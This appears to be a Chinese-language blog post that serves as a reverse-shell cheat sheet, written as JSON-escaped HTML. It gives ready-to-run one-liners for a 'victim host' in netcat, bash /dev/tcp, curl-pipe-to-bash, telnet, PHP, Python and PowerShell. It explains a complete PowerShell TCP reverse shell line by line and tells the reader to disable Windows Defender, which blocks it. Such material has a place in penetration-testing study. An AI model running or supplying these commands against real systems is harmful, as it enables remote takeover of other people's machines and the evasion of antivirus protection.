<\/p>\n\n\n\n
\u53cd\u5411shell \u662f\u4e00\u7a2e\u7528\u65bc\u5728\u76ee\u6a19\u7cfb\u7d71\u4e0a\u5efa\u7acb\u8207\u653b\u64ca\u8005\u7cfb\u7d71\u7684\u901a\u8a0a\u9023\u63a5\u7684\u6280\u8853\u3002\u9019\u7a2e\u6280\u8853\u901a\u5e38\u61c9\u7528\u65bc\u4e00\u4e9b\u7279\u6b8a\u60c5\u6cc1\u4e0b\uff1a<\/p>\n\n\n\n
\u53cd\u5411shell \u7684\u5be6\u73fe\u65b9\u5f0f\u6709\u591a\u7a2e\uff0c\u5177\u9ad4\u53d6\u6c7a\u65bc\u76ee\u6a19\u7cfb\u7d71\u7684\u74b0\u5883\u548c\u53ef\u7528\u7684\u5de5\u5177\u3002\u4f8b\u5982\uff0c\u53ef\u4ee5\u5229\u7528 netcat\u3001Python \u6216 PHP \u7b49\u8a9e\u8a00\u548c\u5de5\u5177\u4f86\u5be6\u73fe\u53cd\u5411shell\u3002\u653b\u64ca\u8005\u9700\u8981\u6839\u64da\u76ee\u6a19\u7cfb\u7d71\u7684\u7279\u9ede\u9078\u64c7\u6700\u9069\u5408\u7684\u53cd\u5411shell \u65b9\u5f0f<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u5efa\u7acb\u53cd\u5411shell\u524d\uff0c\u8981\u5148\u6e96\u5099\u597d\u76e3\u807d\u7684\u4e3b\u6a5f <\/p>\n\n\n\n
\u4ee5nc\u70ba\u4f8b\uff0c\u683c\u5f0f\u70ba: nc -l -v -p [ listen IP] < listen port > , \u8aaa\u660e\u5982\u4e0b<\/p>\n\n\n\n
l<\/code>\uff1a\u76e3\u807d\u6a21\u5f0f (listen mode)\u3002\u9019\u662f\u6307\u5b9a netcat<\/code> \u76e3\u807d\u6307\u5b9a\u7684\u9023\u63a5\u57e0\u3002<\/li>\n\n\n\nv<\/code>\uff1a\u8a73\u7d30\u6a21\u5f0f (verbose mode)\u3002\u9019\u4f7f netcat<\/code> \u63d0\u4f9b\u8a73\u7d30\u7684\u8cc7\u8a0a\u8f38\u51fa\uff0c\u5e6b\u52a9\u4f7f\u7528\u8005\u4e86\u89e3\u9023\u63a5\u548c\u8cc7\u6599\u50b3\u8f38\u7684\u8a73\u7d30\u60c5\u6cc1\u3002<\/li>\n\n\n\np<\/code>\uff1a\u9023\u63a5\u57e0 (port)\u3002\u6307\u5b9a netcat<\/code> \u8981\u76e3\u807d\u7684\u9023\u63a5\u57e0\u3002<\/li>\n<\/ul>\n\n\n\n\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n
# nc -l -p 8888<\/code><\/p>\n\n\n\n# nc -lvp 8888<\/code><\/p>\n\n\n\n\u63a5\u8457\u5c31\u53ef\u4ee5\u7528\u4ee5\u4e0b\u65b9\u5f0f\u5728\u53d7\u5bb3\u4e3b\u6a5f\u4e0a\u9023\u7dda<\/p>\n\n\n\n
\n- netcat<\/li>\n\n\n\n
- bash<\/li>\n\n\n\n
- curl<\/li>\n\n\n\n
- php<\/li>\n\n\n\n
- powershell<\/li>\n<\/ul>\n\n\n\n
\u7576\u53d7\u5bb3\u4e3b\u6a5f\u8a2a\u554f\u6642\uff0c\u76e3\u807d\u7aef\u7684nc\u5c31\u6703\u986f\u793a\u985e\u4f3c\u9019\u6a23\u7684\u8a0a\u606f connect to [192.168.1.1] from (UNKNOWN) [192.168.1.100] 58676<\/code>\uff0c\u63a5\u8457\u5c31\u53ef\u4ee5\u5728\u76e3\u807d\u7aef\u9019\u908a\u4e0b\u6307\u4ee4\u63a7\u5236\u53d7\u5bb3\u4e3b\u6a5f<\/p>\n\n\n\n
\n\n\n\nreverse proxy<\/h3>\n\n\n\n
\u5728\u6c92\u6709\u5c0d\u5916 IP \u6216\u6c92\u8fa6\u6cd5\u6539\u9632\u706b\u7246\u8a2d\u5b9a\u7684\u60c5\u6cc1\u4e0b\uff0c\u628a\u5167\u90e8\u670d\u52d9\u300c\u66b4\u9732\u300d\u5230\u516c\u7db2\u3002<\/p>\n\n\n\n
\u4f8b\u5982\uff1a\u4f60\u5728 localhost:3000 \u8dd1\u4e86\u4e00\u500b\u7db2\u7ad9\uff0cngrok \u53ef\u4ee5\u7d66\u4f60\u4e00\u500b https:\/\/xxxx.ngrok.io \u7684\u7db2\u5740\uff0c\u5916\u90e8\u4efb\u4f55\u4eba\u90fd\u80fd\u8a2a\u554f\u3002<\/p>\n\n\n\n
https:\/\/ngrok.com\/downloads<\/a><\/p>\n\n\n\n
\n\n\n\n\u53cd\u5411shell\u5e38\u7528\u8cc7\u6e90<\/h3>\n\n\n\n\n- \u5404\u7a2e\u53cd\u5411shell\u7bc4\u4f8bhttps:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/Methodology%20and%20Resources\/Reverse%20Shell%20Cheatsheet.md<\/a><\/li>\n\n\n\n
- Reverse Shell Generator: https:\/\/www.revshells.com<\/a><\/li>\n<\/ul>\n\n\n\n
\n\n\n\nnetcat<\/h2>\n\n\n\n
\u5e38\u898b\u7684\u53cd\u5411shell\u7528\u6cd5\u6709\u4ee5\u4e0b<\/p>\n\n\n\n
nc -c \/bin\/sh <remote IP> <remote Port><\/code><\/p>\n\n\n\nnc < remote ip> <remote port> -e c:\\windows\\system32\\cmd.exe <\/code><\/p>\n\n\n\n\/bin\/sh | nc <remote IP> <remote port><\/code><\/p>\n\n\n\n\u4e5f\u53ef\u7d50\u5408PHP\u8a9e\u6cd5\u63d2\u5165<\/p>\n\n\n\n
<?passthru(\u201cnc -e \/bin\/sh [yourIP] [yourPort]\u201d); ?><\/code><\/p>\n\n\n\n
\n\n\n\nbash <\/h2>\n\n\n\n
\u5e38\u898b\u7684\u53cd\u5411shell\u7528\u6cd5\u6709\u4ee5\u4e0b<\/p>\n\n\n\n
bash -i >& \/dev\/tcp\/<remote IP>\/<remote Port> 0>&1<\/code><\/p>\n\n\n\n\u5982\u679c\u51fa\u73fe zsh: no such file or directory<\/code>\u8868\u793a\u6b63\u5728\u7528zsh\uff0c\u53ef\u4ee5\u63db\u4ee5\u4e0b\u57f7\u884c\uff0c\u53ef\u5f37\u5236\u4f7f\u7528bash<\/p>\n\n\n\nbash -c \"bash -i >& \/dev\/tcp\/<remote IP>\/<remote Port> 0>&1\"<\/code><\/p>\n\n\n\n\u6307\u4ee4\u5206\u5225\u89e3\u91cb\u5982\u4e0b<\/p>\n\n\n\n
\nbash -i <\/code> \u7522\u751f\u4e00\u500b\u4e92\u52d5shell<\/li>\n\n\n\n>&<\/code> \u5c07\u806f\u5408\u7b26\u865f\u524d\u9762\u7684\u5167\u5bb9\u8207\u5f8c\u9762\u7d50\u5408\uff0c\u7136\u5f8c\u4e00\u8d77\u91cd\u5b9a\u5411\u7d66\u5f8c\u8005<\/li>\n\n\n\n\/dev\/tcp\/<remote IP>\/<remote Port><\/code> \u8b93\u76ee\u6a19\u4e3b\u6a5f\u8207\u653b\u64ca\u6a5f<remote IP><\/code>\u7684<remote Port><\/code>\u57e0\u5efa\u7acb\u4e00\u500btcp\u9023\u7dda<\/li>\n\n\n\n0>&1<\/code> \u5c07\u6a19\u6e96\u8f38\u5165\u8207\u6a19\u6e96\u8f38\u51fa\u7684\u5167\u5bb9\u7d50\u5408\uff0c\u7136\u5f8c\u91cd\u5b9a\u5411\u7d66\u524d\u9762\u6a19\u6e96\u8f38\u51fa\u7684\u5167\u5bb9\u3002<\/li>\n<\/ul>\n\n\n\nrefer
https:\/\/xz.aliyun.com\/t\/9488?time__1311=n4%2BxuDgD9AdWqhDBqDwmDUhDAhODBjo%2FxYwD&alichlgref=https%3A%2F%2Fwww.google.com%2F<\/p>\n\n\n\n
\n\n\n\ncurl<\/h2>\n\n\n\n
\u900f\u904ebash\u7684\u65b9\u5f0f\u9023\u7dda<\/p>\n\n\n\n
1.\u5148\u5728<remote IP><\/code>\u7684\u7db2\u7ad9index.html\u5167\u6e96\u5099\u4ee5\u4e0b\u5167\u5bb9<\/p>\n\n\n\nbash -i >&<\/strong> \/dev\/tcp\/<remote IP>\/8888 0>&1<\/pre>\n\n\n\n2.\u7136\u5f8c\u7528curl\u628a<remote IP><\/code>\u7684\u7db2\u7ad9\u5167\u5bb9\u4e0b\u8f09\u4e26\u57f7\u884c<\/p>\n\n\n\ncurl <remote IP>|<\/strong>bash<\/code><\/p>\n\n\n\n
\n\n\n\ntelnet<\/h2>\n\n\n\n\u65b9\u6cd51<\/h3>\n\n\n\n
\u5728\u53d7\u5bb3\u4e3b\u6a5f\u5167\u57f7\u884c\u4ee5\u4e0b<\/p>\n\n\n\n
mknod a p; telnet <remote IP> 8888 0<a | \/bin\/bash 1>a<\/code><\/p>\n\n\n\n<\/p>\n\n\n\n
\u65b9\u6cd52<\/h3>\n\n\n\n
\u9700\u8981\u540c\u6642\u76e3\u807d2\u500b\u7aef\u53e3\uff0c\u9664\u4e86\u4e4b\u524d\u76e3\u807d\u76848888\u5916\uff0c\u9084\u8981\u5728\u53e6\u5916\u76e3\u807d\u4e00\u500bPort,\u4f8b\u5982 nc -lvp 9999<\/code><\/p>\n\n\n\n\u63a5\u8457\u5728\u53d7\u5bb3\u4e3b\u6a5f\u5167\u57f7\u884c\u4ee5\u4e0b<\/p>\n\n\n\n
telnet <remote IP> 8888 | \/bin\/bash | telnet <remote IP> 8889<\/code><\/p>\n\n\n\n
\n\n\n\nphp<\/h2>\n\n\n\n
\u5e38\u898b\u7684\u8a9e\u6cd5\u6709<\/p>\n\n\n\n
php -r '$s=fsockopen(\"<remote IP>\",8888);exec(\"\/bin\/sh -i <&3 >&3 2>&3\");' <\/code><\/p>\n\n\n\nexec\u53ef\u4ee5\u63db\u6210system, shell_exec, passthru, popen<\/p>\n\n\n\n
\u6216\u662f\u7528\u53cd\u659c\u7dda\u55ae\u5f15\u865f\uff0c\u5982\u4e0b<\/p>\n\n\n\n
php -r '$s=fsockopen(\"<remote IP>\",8888);`\/bin\/sh -i <&3 >&3 2>&3`;' <\/code><\/p>\n\n\n\n
\n\n\n\npython<\/h2>\n\n\n\n
\u5e38\u898b\u7684\u8a9e\u6cd5\u6709<\/p>\n\n\n\n
python -<\/strong>c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<remote IP>\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\/bin\/sh\",\"-i\"]);'<\/code><\/p>\n\n\n\n<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
Invoke-PowerShellTcp.ps1<\/h2>\n\n\n\n
\u6b64\u70banishang\u958b\u767c\u7684powershell\u7684\u8173\u672c\uff0c\u57f7\u884c\u65b9\u5f0f\u5982\u4e0b<\/p>\n\n\n\n
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444<\/code><\/p>\n\n\n\nPowershell\u8173\u672c\u57f7\u884c\u7b56\u7565\u662f\u9810\u8a2d\u4e0d\u5141\u8a31\u57f7\u884c\u4efb\u4f55\u8173\u672c\uff0c\u76f4\u63a5\u57f7\u884c\u53ef\u80fd\u6703\u88ab\u7981\u6b62\uff0c\u8981\u5141\u8a31\u57f7\u884c\u53ef\u4f7f\u7528\u7ba1\u7406\u54e1\u8eab\u5206\u57f7\u884cpowershell\u7136\u5f8c\u57f7\u884c\u6307\u4ee4 set-executionpolicy remotesigned <\/code><\/p>\n\n\n\nrefer
https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcp.ps1<\/a>
https:\/\/blog.csdn.net\/weixin_42628854\/article\/details\/123990629<\/a>
https:\/\/zhuanlan.zhihu.com\/p\/38067240<\/a><\/p>\n\n\n\n<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
powershell \u547d\u4ee4\u57f7\u884c<\/h2>\n\n\n\npowershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"<\/code><\/pre>\n\n\n\n\u6307\u4ee4\u5206\u5225\u89e3\u91cb\u5982\u4e0b<\/p>\n\n\n\n
Calling PowerShell<\/h3>\n\n\n\n
powershell -nop -c<\/code><\/p>\n\n\n\n\n- “nop” \u662f “NoProfile” \u7684\u7e2e\u5beb\uff0c\u610f\u601d\u662f\u6307\u5728\u57f7\u884c PowerShell \u6642\u4e0d\u52a0\u8f09\u4efb\u4f55\u7528\u6236\u914d\u7f6e\u6587\u4ef6\uff08profile\uff09\uff0c\u5305\u62ec
$PROFILE<\/code> \u4e2d\u5b9a\u7fa9\u7684\u4efb\u4f55\u81ea\u5b9a\u7fa9\u8a2d\u7f6e\u3002\u9019\u6a23\u505a\u53ef\u4ee5\u4f7f PowerShell \u5728\u57f7\u884c\u6642\u4e0d\u53d7\u7528\u6236\u914d\u7f6e\u6587\u4ef6\u4e2d\u8a2d\u7f6e\u7684\u5f71\u97ff\uff0c\u5f9e\u800c\u66f4\u5feb\u901f\u5730\u555f\u52d5\u4e26\u57f7\u884c\u547d\u4ee4\u3002\u9019\u5c0d\u65bc\u4e00\u4e9b\u7279\u5b9a\u7684\u60c5\u6cc1\uff0c\u6bd4\u5982\u9700\u8981\u5feb\u901f\u57f7\u884c\u4e00\u500b\u547d\u4ee4\u6216\u8173\u672c\u6642\uff0c\u5f88\u6709\u7528\u3002<\/li>\n\n\n\n- “-c” \u662f “Command” \u7684\u7e2e\u5beb\uff0c\u7528\u65bc\u6307\u5b9a\u8981\u57f7\u884c\u7684\u547d\u4ee4\u6216\u8173\u672c\u584a\u3002\u7576\u4f60\u5728 PowerShell \u547d\u4ee4\u884c\u4e2d\u4f7f\u7528”-c” \u9078\u9805\u6642\uff0c\u5f8c\u9762\u53ef\u4ee5\u8ddf\u96a8\u4e00\u500b\u547d\u4ee4\u6216\u4e00\u6bb5 PowerShell \u8173\u672c\u3002\u4f8b\u5982\uff0c
powershell.exe -c \"Get-Process\"<\/code> \u5c07\u57f7\u884c Get-Process<\/code> \u547d\u4ee4\uff0c\u986f\u793a\u7576\u524d\u7cfb\u7d71\u4e2d\u6b63\u5728\u904b\u884c\u7684\u9032\u7a0b\u3002<\/li>\n<\/ul>\n\n\n\nBinding A Socket<\/h3>\n\n\n\n
$client = New-Object System.Net.Sockets.TCPClient(10.10.14.158,443);<\/code><\/p>\n\n\n\n\u5efa\u7acb\u4e86\u4e00\u500b\u65b0\u7684 TCPClient \u7269\u4ef6\uff0c\u7528\u65bc\u8207\u6307\u5b9a\u7684 IP \u5730\u5740\u548c\u7aef\u53e3\u5efa\u7acb TCP \u9023\u63a5\u3002\u7269\u4ef6\u7684\u985e\u578b\u662f System.Net.Sockets.TCPClient<\/code>\uff0c\u9019\u662f .NET Framework \u4e2d\u7528\u65bc TCP \u901a\u8a0a\u7684\u985e\u3002<\/p>\n\n\n\nSetting The Command Stream<\/h3>\n\n\n\n
$stream = $client.GetStream();<\/code><\/p>\n\n\n\n\u7372\u53d6\u8207 $client<\/code> \u7269\u4ef6\u95dc\u806f\u7684\u7db2\u7d61\u6d41\uff0c\u4ee5\u4fbf\u5f8c\u7e8c\u7684\u901a\u8a0a\u64cd\u4f5c\u3002.GetStream()<\/code> \u662f TCPClient \u7269\u4ef6\u7684\u4e00\u500b\u65b9\u6cd5\uff0c\u7528\u65bc\u7372\u53d6\u8207 TCP \u9023\u63a5\u95dc\u806f\u7684 NetworkStream \u7269\u4ef6\u3002<\/p>\n\n\n\nEmpty Byte Stream<\/h3>\n\n\n\n
[byte[]]$bytes = 0..65535|%{0};<\/code><\/p>\n\n\n\n\u5275\u5efa\u4e86\u4e00\u500b\u9577\u5ea6\u70ba 65536 \u7684\u7a7a\u7684 byte \u9663\u5217\u3002<\/p>\n\n\n\n
\n[byte[]]<\/code> \u544a\u8a34 PowerShell \u5c07\u8b8a\u6578 $bytes<\/code> \u5ba3\u544a\u70ba\u4e00\u500b byte \u9663\u5217\u3002<\/li>\n\n\n\n0..65535<\/code> \u751f\u6210\u4e00\u500b\u5f9e 0 \u5230 65535 \u7684\u6574\u6578\u5e8f\u5217\u3002<\/li>\n\n\n\n|%{0}<\/code> \u4f7f\u7528\u7ba1\u9053\u5c07\u6bcf\u500b\u6574\u6578\u6620\u5c04\u70ba\u503c 0\uff0c\u9019\u6a23\u5c31\u5275\u5efa\u4e86\u4e00\u500b\u5305\u542b 65536 \u500b\u5143\u7d20\uff0c\u6bcf\u500b\u5143\u7d20\u7684\u503c\u90fd\u662f 0 \u7684 byte \u9663\u5217\u3002<\/li>\n<\/ul>\n\n\n\nStream Parameters<\/h3>\n\n\n\n
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)<\/code><\/p>\n\n\n\n\u4f7f\u7528 while<\/code> \u5faa\u74b0\u4e0d\u65b7\u5f9e $stream<\/code> \u4e2d\u8b80\u53d6\u6578\u64da\uff0c\u76f4\u5230\u8b80\u53d6\u64cd\u4f5c\u8fd4\u56de\u7684\u5b57\u7bc0\u6578\u91cf\u70ba 0<\/p>\n\n\n\n\n$stream.Read($bytes, 0, $bytes.Length)<\/code> \u662f\u4e00\u500b\u65b9\u6cd5\u8abf\u7528\uff0c\u5f9e $stream<\/code> \u4e2d\u8b80\u53d6\u6578\u64da\u4e26\u5c07\u5176\u5b58\u5132\u5230 $bytes<\/code> \u9663\u5217\u4e2d\u3002$i<\/code> \u8b8a\u6578\u63a5\u6536\u6b64\u65b9\u6cd5\u8abf\u7528\u7684\u8fd4\u56de\u503c\uff0c\u8a72\u8fd4\u56de\u503c\u662f\u5be6\u969b\u8b80\u53d6\u7684\u5b57\u7bc0\u6578\u91cf\u3002<\/li>\n\n\n\n-ne 0<\/code> \u610f\u5473\u7740\u201c\u4e0d\u7b49\u65bc 0\u201d\u3002\u56e0\u6b64\uff0c\u9019\u500b\u689d\u4ef6\u78ba\u4fdd\u53ea\u8981 Read<\/code> \u65b9\u6cd5\u8fd4\u56de\u7684\u5b57\u7bc0\u6578\u91cf\u4e0d\u70ba 0\uff0c\u5c31\u6703\u7e7c\u7e8c\u57f7\u884c\u5faa\u74b0\u3002<\/li>\n<\/ul>\n\n\n\nSet The Byte Encoding<\/h3>\n\n\n\n
{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);<\/code><\/p>\n\n\n\n\u5275\u5efa\u4e86\u4e00\u500b\u8b8a\u6578 $data<\/code>\uff0c\u4e26\u5c07\u5f9e $bytes<\/code> \u9663\u5217\u4e2d\u8b80\u53d6\u7684\u5b57\u7bc0\u6578\u64da\u8f49\u63db\u70ba ASCII \u5b57\u7b26\u4e32\u5b58\u5132\u5728 $data<\/code> \u4e2d\u3002<\/p>\n\n\n\n\n(New-Object -TypeName System.Text.ASCIIEncoding)<\/code> \u5275\u5efa\u4e86\u4e00\u500b ASCIIEncoding \u7269\u4ef6\uff0c\u7528\u65bc\u5c07\u5b57\u7bc0\u6578\u64da\u8f49\u63db\u70ba ASCII \u5b57\u7b26\u4e32\u3002<\/li>\n\n\n\n.GetString($bytes, 0, $i)<\/code> \u662f\u5c0d ASCIIEncoding \u7269\u4ef6\u7684 GetString<\/code> \u65b9\u6cd5\u7684\u8abf\u7528\uff0c\u8a72\u65b9\u6cd5\u63a5\u53d7\u4e00\u500b\u5b57\u7bc0\u9663\u5217 $bytes<\/code>\u3001\u8d77\u59cb\u4f4d\u7f6e\u7d22\u5f15\uff080\uff09\u548c\u8981\u8f49\u63db\u7684\u5b57\u7bc0\u6578\u91cf $i<\/code>\u3002\u5b83\u5c07 $bytes<\/code> \u4e2d\u7684\u5b57\u7bc0\u6578\u64da\u5f9e\u6307\u5b9a\u4f4d\u7f6e\u958b\u59cb\u8f49\u63db\u70ba ASCII \u5b57\u7b26\u4e32\u3002<\/li>\n<\/ul>\n\n\n\nInvoke-Expression<\/h3>\n\n\n\n
$sendback = (iex $data 2>&1 | Out-String );<\/code><\/p>\n\n\n\n\u57f7\u884c\u4e86\u4e00\u500b\u547d\u4ee4\u6216\u8173\u672c\uff0c\u4e26\u5c07\u7d50\u679c\u5b58\u5132\u5728 $sendback<\/code> \u8b8a\u6578\u4e2d\u3002<\/p>\n\n\n\n\niex $data<\/code> \u4f7f\u7528 iex<\/code>\uff08Invoke-Expression\uff09 cmdlet \u57f7\u884c\u4e86 $data<\/code> \u8b8a\u6578\u4e2d\u5305\u542b\u7684\u547d\u4ee4\u6216\u8173\u672c\u3002<\/li>\n\n\n\n2>&1<\/code> \u5c07\u6a19\u6e96\u932f\u8aa4\u6d41\uff08stderr\uff09\u91cd\u5b9a\u5411\u5230\u6a19\u6e96\u8f38\u51fa\u6d41\uff08stdout\uff09\u3002\u9019\u6a23\u505a\u53ef\u4ee5\u78ba\u4fdd\u7121\u8ad6\u662f\u6a19\u6e96\u8f38\u51fa\u9084\u662f\u6a19\u6e96\u932f\u8aa4\uff0c\u90fd\u6703\u88ab\u6355\u7372\u4e26\u5305\u542b\u5728\u7d50\u679c\u4e2d\u3002<\/li>\n\n\n\n| Out-String<\/code> \u5c07\u547d\u4ee4\u6216\u8173\u672c\u7684\u8f38\u51fa\u8f49\u63db\u70ba\u5b57\u7b26\u4e32\uff0c\u9019\u6a23\u53ef\u4ee5\u5c07\u8f38\u51fa\u7684\u7d50\u679c\u5132\u5b58\u5230\u8b8a\u6578\u4e2d\u3002<\/li>\n<\/ul>\n\n\n\nShow Working Directory<\/h3>\n\n\n\n
$sendback2 = $sendback + 'PS ' + (pwd).path + '> ';<\/code><\/p>\n\n\n\n\u5c07\u525b\u525b\u57f7\u884c\u547d\u4ee4\u6216\u8173\u672c\u5f8c\u5f97\u5230\u7684\u7d50\u679c $sendback<\/code> \u8207\u7576\u524d\u6240\u5728\u76ee\u9304\u7684\u8def\u5f91\uff08\u4f7f\u7528 (pwd).path<\/code> \u7372\u53d6\uff09\u548c\u63d0\u793a\u7b26 “PS ” \u4ee5\u53ca “>” \u5b57\u7b26\u4e32\u7d50\u5408\uff0c\u7136\u5f8c\u5c07\u7d50\u679c\u5b58\u5132\u5728 $sendback2<\/code> \u8b8a\u6578\u4e2d\u3002<\/p>\n\n\n\nSets Sendbyte<\/h3>\n\n\n\n
$sendbyte= ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}<\/code><\/p>\n\n\n\n\u5c07 $sendback2<\/code> \u5b57\u7b26\u4e32\u8f49\u63db\u70ba ASCII \u7de8\u78bc\u7684\u5b57\u7bc0\u5e8f\u5217\uff0c\u7136\u5f8c\u5c07\u9019\u4e9b\u5b57\u7bc0\u5beb\u5165\u5230 $stream<\/code> \u5c0d\u8c61\u6240\u8868\u793a\u7684\u7db2\u7d61\u6d41\u4e2d\uff0c\u6700\u5f8c\u5c07\u7db2\u7d61\u6d41\u9032\u884c\u5237\u65b0\uff0c\u4ee5\u78ba\u4fdd\u6578\u64da\u5df2\u7d93\u88ab\u5beb\u5165\u3002<\/p>\n\n\n\n\n([text.encoding]::ASCII).GetBytes($sendback2)<\/code> \u4f7f\u7528 text.encoding<\/code> \u985e\u7684 GetBytes<\/code> \u65b9\u6cd5\u5c07 $sendback2<\/code> \u5b57\u7b26\u4e32\u8f49\u63db\u70ba ASCII \u7de8\u78bc\u7684\u5b57\u7bc0\u5e8f\u5217\u3002<\/li>\n\n\n\n$stream.Write($sendbyte,0,$sendbyte.Length)<\/code> \u4f7f\u7528 $stream<\/code> \u7269\u4ef6\u7684 Write<\/code> \u65b9\u6cd5\u5c07 $sendbyte<\/code> \u4e2d\u7684\u5b57\u7bc0\u5e8f\u5217\u5beb\u5165\u5230\u7db2\u7d61\u6d41\u4e2d\uff0c\u5f9e\u7d22\u5f15\u4f4d\u7f6e 0 \u958b\u59cb\uff0c\u5beb\u5165 $sendbyte.Length<\/code> \u9577\u5ea6\u7684\u5b57\u7bc0\u6578\u64da\u3002<\/li>\n\n\n\n$stream.Flush()<\/code> \u5c07\u7db2\u7d61\u6d41\u9032\u884c\u5237\u65b0\uff0c\u4ee5\u78ba\u4fdd\u6240\u6709\u7684\u6578\u64da\u90fd\u5df2\u7d93\u88ab\u5beb\u5165\u5230\u6d41\u4e2d\u3002<\/li>\n<\/ul>\n\n\n\nTerminate TCP Connection<\/h3>\n\n\n\n
$client.Close()\"<\/code><\/p>\n\n\n\n\u95dc\u9589\u4e86\u4e4b\u524d\u5efa\u7acb\u7684 TCP \u9023\u63a5<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u8981\u6ce8\u610f\u4e0a\u8ff0\u6307\u4ee4\u6703\u88abWindows Defender antivirus\u963b\u64cb\uff0c\u4e26\u986f\u793a\u4ee5\u4e0b\u756b\u9762\uff0c\u56e0\u6b64\u9700\u8981\u5148\u5728\u5c07\u9632\u6bd2\u66ab\u6642\u95dc\u9589<\/p>\n\n\n\n
At line:1 char:1\n+ $client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443) ...\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nThis script contains malicious content and has been blocked by your antivirus software.\n + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException\n + FullyQualifiedErrorId : ScriptContainedMaliciousContent<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
refer<\/p>\n\n\n\n